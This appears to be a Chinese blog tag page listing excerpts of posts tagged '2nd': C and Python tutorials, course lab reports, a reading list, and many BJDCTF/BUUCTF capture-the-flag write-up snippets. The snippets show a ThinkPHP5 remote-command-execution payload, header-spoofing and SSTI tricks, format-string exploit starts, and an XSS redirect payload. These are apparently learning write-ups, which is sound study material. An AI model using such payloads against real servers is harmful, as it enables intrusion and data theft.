首页 > TAG信息列表 > 2nd

c programming language 英语原版第二版

下载地址 http://math.ecnu.edu.cn/~jypan/Teaching/ParaComp/books/The C Programming Language 2nd.pdf 豆瓣介绍 https://book.douban.com/subject/1882483/

python 2nd 条件控制之while语句

实例 while True: s = input('Enter something : ') if s == 'quit': break print('Length of the string is', len(s)) print('Done') 实例 while True: s = input('Enter something : ') if

python 2nd 条件控制

实例1 #简单判断是否成年 age=19 if age>18: print("成年了") else: print("未成年") #输出:成年了   实例2 #根据红绿灯执行 lights="blue" if lights == "red": print("stop") elif lights == "green": print("go

[BJDCTF 2nd]假猪套天下第一

抓个登录时的包发现L0g1n.php 抓个L0g1n.php的包 提示我们99年才能进去,所以把时间调到尽可能大: 发现提示发生变化,说只有本机才能进去,我们先用修改X-Forwarded-For尝试一下 发现XFF被过滤,尝试用Client-ip或者X-Real-ip来进行登录: 成功,发现提示发生变化,需要我们是来自gem-

[BUUCTF-pwn]——wdb_2018_2nd_easyfmt

[BUUCTF-pwn]——wdb_2018_2nd_easyfmt 一个简单的格式化字符串利用问题 泄露出got表地址,找到libc基地址寻找system的实际地址将printf_got修改为system的地址写入”/bin/sh" exploit from pwn import * from LibcSearcher import * context.log_level = "debug" p = remote

《Effective Java 2nd》第7章 方法

目录 第38条 检查参数的有效性 第39条 必要时进行保护性拷贝 第40条 谨慎设计方法签名 第41条 慎用重载 第42条 慎用可变参数 第43条 返回零长度的数组或集合,而不是null 第44条 为所有导出的API元素编写文档注释 关注点:可用性、健壮性、灵活性 第38条 检查参数的有效性 在编写

teacherone的任务 - COCI April 2016 2nd

Task: Relay 题目翻译 有一座岛屿,旁边有若干条船。每当有一条船遇难,他就会给其他船发出“Mayday”信号,每个接到"Mayday"信号的船会向其他船发出"Relay"信号。两个船可以通信当且仅当两个船所在位置连线不穿过岛屿。岛屿可以近似为一个凸多边形,船可以近似为一个点。现在遇难的船为1

[BUUCTF-pwn]——[BJDCTF 2nd]r2t4

[BUUCTF-pwn]——[BJDCTF 2nd]r2t4 题目地址: https://buuoj.cn/challenges#[BJDCTF%202nd]r2t4 checksec一下,看一下。 IDA中,发现了后面函数和格式化字符串漏洞。 找到后门函数的地址, 并且算格式化字符串的偏移 思路 开启了canary保护,我们想要执行我们想要执行的代码, 可

1753. Maximum Score From Removing Stones

package LeetCode_1753 /** * 1753. Maximum Score From Removing Stones * https://leetcode.com/problems/maximum-score-from-removing-stones/ * You are playing a solitaire game with three piles of stones of sizes a​​​​​​, b,​​​​​​ and c​​​​​

CTF-Pwn-[BJDCTF 2nd]one_gadget的wp

64位,放进ida看看 看一看这个main方法,要我们输入一个gadget,然后它回打印出来,再来看看init方法 用onegadget看看libc one_gadget libc-2.29.so 发现 写脚本 from pwn import * r=remote("node3.buuoj.cn",27772) elf=ELF("./one_gadget") libc=ELF('libc-2.29.so') one_g

【Buuctf】[BJDCTF 2nd]elementmaster WriteUp

题目 【Buuctf】[BJDCTF 2nd]elementmaster 分析 先查看源代码,hiddden id就很奇怪 506F2E,百度一查,蹦出来个颜色十六进制,那么应该就是十六进制转换了,转换数字没意义,转文本试试看 访问Po.php 得到一个点,页面中啥也没有 试试看别的元素,全部是404 一个个试工作量太大,用脚本 最

buuctf-[BJDCTF 2nd]fake google简单拿下flag

这道题, 如果你知道一些沙盒机制,其实也完全没有技术含量,没有过滤任何东西,简单记录下吧 首先是这样一个界面,搜索框,其它也看不出来什么端倪,    我们随便输入点东西搜索1    源码里发现了线索,是ssti,那我们就简单就行测试,发现payload?name={{4*5}} 结果,被当作表达式执行了,返回20

初试逆向题[BJDCTF 2nd]8086

先放进ida里面,只发现2个函数,sub_10030和start: sub_10030是一个段内近调用(near)的无限死循环: 而start是一个调用sub_10030的函数(近似的认为start也为无限死循环): 既然flag不在这里,再去看汇编代码段: lea指令使bx赋值为aU…Wz的偏移地址。 loc_10039是一个循环,循环了cx(22h)次。

20192327 2020-2021-1 《数据结构与面向对象程序设计》实验八报告

20192327 2020-2021-1 《数据结构与面向对象程序设计》实验八报告 课程:《程序设计与数据结构》 班级: 1923 姓名: 何源 学号: 20192327 实验教师:王志强 实验日期:2020年12月3日 必修/选修: 必修 1.实验内容 1.(1)给定一个序列AB#CD###E#F##建立一颗树,根据“二叉树的生成”算法构造这颗树

[BJDCTF 2nd]xss之光

[BJDCTF 2nd]xss之光 御剑 看了一下url,输入啥都不对。掏出御剑直接扫,扫出一个.git GitHack安排 得到: <?php $a = $_GET['yds_is_so_beautiful']; echo unserialize($a); 原生类反序列化 参考 构造payload: <?php $a = serialize(new Exception("<script>window.location.href='IP&#

buu [BJDCTF 2nd]cat_flag

查看题目 一只有鸡腿,一只没有鸡腿。很容易想到二进制数0,1。 将图片用二进制表示为: 01000010 01001010 01000100 01111011 01001101 00100001 01100001 00110000 01111110 01111101 将二进制数转为16进制进制转换,再16进制转文本16转文。 得到flag为: BJD{M!a0~}

BUUCTF-crypto:[BJDCTF 2nd]cat_flag

1.打开图片,就发现鸡腿像1,饭团像0,二进制; 2.将二进制翻译成10进制,发现刚好是66,对应着ACSII码B,刚好对应BJD的B,如果下一行是J,那就应该是对了,一转换果然是74对应J,然后将下列依次转换,数字分别是66 74 68 123 77 33 97 48 126 125表示BJD{M!a0~} 3.将BJD换成flag提交就对了。

20192317邓子彦 实验五 《数据结构与面向对象程序设计》实验报告

20192317邓子彦 实验五 《数据结构与面向对象程序设计》实验报告 课程:《程序设计与数据结构》 班级: 1923 姓名: 邓子彦 学号:20192317 实验教师:王志强 实验日期:2020年10月30日 必修/选修: 必修 1.实验内容 1.Android Stuidio的安装测试: 参考《Java和Android开发学习指南(第二版)(EPUB

20192309 2020-2021-1 《数据结构与面向对象程序设计》 实验五报告

20192309 2020-2021-1 《数据结构与面向对象程序设计》 实验五报告 课程:《数据结构与面向对象程序设计》 班级:1923 姓名:金一非 学号:20192309 实验教师:王志强 实验日期:2020年10月30日 必修/选修:必修 1、实验内容 (1)Android Stuidio的安装测试: 参考《Java和Android开发学习指南(第二

[BJDCTF 2nd]old-hack

   题目提示是thinkphp5,直接搜索thinkphp5的漏洞  发现thinkphp5有远程命令执行漏洞,详细如下文章  https://www.freebuf.com/vuls/194105.html  payload: _method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag    

FrontEnd-Basis-2nd

周四,雨,记录生活分享点滴 参考博客:https://www.cnblogs.com/yuanchenqi/articles/6000358.html   HTTP协议   HTTP概述 HTTP即超文本传输协议,浏览器(客户端)与服务器之间通信的规则 特点: 超文本传输协议,基于请求与响应模式 无状态协议(当连接完成后就结束服务,再次连接时又是一次

CTF-Pwn-[BJDCTF 2nd]rci

CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]rci 下载rci文件 思

CTF-Pwn-[BJDCTF 2nd]snake2_dyn

CTF-Pwn-[BJDCTF 2nd]snake2_dyn 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]snake2_dyn

[BJDCTF 2nd]elementmaster

先贴一下Y1ng大佬的WP 脑洞确实大,源码中hidden的id可以用hex解码成Po.  在URL后面输入Po.php得到一个点, 然后不知所措 被水淹没  实际上这里是要遍历化学元素周期表来获得全部的信息,最终获得flag 脚本如下 mport requests url='http://68607684-1f65-45a1-96b6-379176edb7

待读书列表

计算的本质 by Tom Stuart, 2014 Hands-on Machine Learning with Scikit-Learn, Keras, and TensorFlow 2nd edition, by Aurélien Géron, 2019 深度学习的数学 by 涌井良幸,涌井贞美, 2019 Effective Python by Brett Slatkin, 2016 Python Tricks by Dan Bader, 2017 Python